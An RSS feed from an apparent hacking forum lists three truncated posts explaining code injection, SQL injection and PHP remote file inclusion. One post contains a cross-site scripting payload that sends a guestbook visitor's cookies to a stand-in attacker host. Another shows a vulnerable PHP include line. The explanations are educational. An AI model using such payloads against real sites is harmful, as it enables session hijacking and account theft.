<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title>Remote File Injection</title>
		<link>http://h4ck3d.forumotion.net/remote-file-injection-f6/-t1.htm</link>
		<description></description>
		<lastBuildDate>Thu, 08 Jan 2009 17:22:49 GMT</lastBuildDate>
		<ttl>10</ttl>
		<image>
			<title>Remote File Injection</title>
			<url>http://illiweb.com/fa/prosilver_grey/site_logo.gif</url>
			<link>http://h4ck3d.forumotion.net/remote-file-injection-f6/-t1.htm</link>
		</image>
		<item>
			<title>Code Injection Usages</title>
			<link>http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-usages-t18.htm</link>
			<dc:creator>JeSTeR</dc:creator>
			<description><![CDATA[Overview and example
<br />

<br />
A web server has a &quot;Guest book&quot; script, which accepts small messages from users, and typically receives messages such as
<br />

<br />
 Nice site!
<br />

<br />
However a malicious person may know of a code injection vulnerability in the &quot;Guest book&quot;, and enters a message such as
<br />

<br />
 Nice Site,  I think I'll take it.&gt;&lt;script&gt;document.location='http://some_attacker/cookie.cgi?' +document]]></description>
			<category>Remote File Injection</category>
			<pubDate>Thu, 08 Jan 2009 17:22:49 GMT</pubDate>
			<comments>http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-usages-t18.htm#18</comments>
			<guid>http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-usages-t18.htm</guid>
		</item>
		<item>
			<title>Code injection</title>
			<link>http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-t17.htm</link>
			<dc:creator>JeSTeR</dc:creator>
			<description>Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or &quot;inject&quot;) code into a computer program to change the course of execution. The results of a Code Injection attack can be disastrous. For instance, code injection is used by some Computer worms to propagate.

Examples of Code Injection



SQL Injection



SQL injection takes advantage of the syntax of SQL to inject commands that  ...</description>
			<category>Remote File Injection</category>
			<pubDate>Thu, 08 Jan 2009 17:20:45 GMT</pubDate>
			<comments>http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-t17.htm#17</comments>
			<guid>http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-t17.htm</guid>
		</item>
		<item>
			<title>Remote File Inclusion</title>
			<link>http://h4ck3d.forumotion.net/remote-file-injection-f6/remote-file-inclusion-t16.htm</link>
			<dc:creator>JeSTeR</dc:creator>
			<description>Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own (malicious) code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this:



include($page . '.php');



This line of PHP code, is then used in URLs like the following example:



http://www.vulnerable.example.org/index.php?page=archive



Because the $page variable is not specifically  ...</description>
			<category>Remote File Injection</category>
			<pubDate>Thu, 08 Jan 2009 17:18:56 GMT</pubDate>
			<comments>http://h4ck3d.forumotion.net/remote-file-injection-f6/remote-file-inclusion-t16.htm#16</comments>
			<guid>http://h4ck3d.forumotion.net/remote-file-injection-f6/remote-file-inclusion-t16.htm</guid>
		</item>
	</channel>
</rss>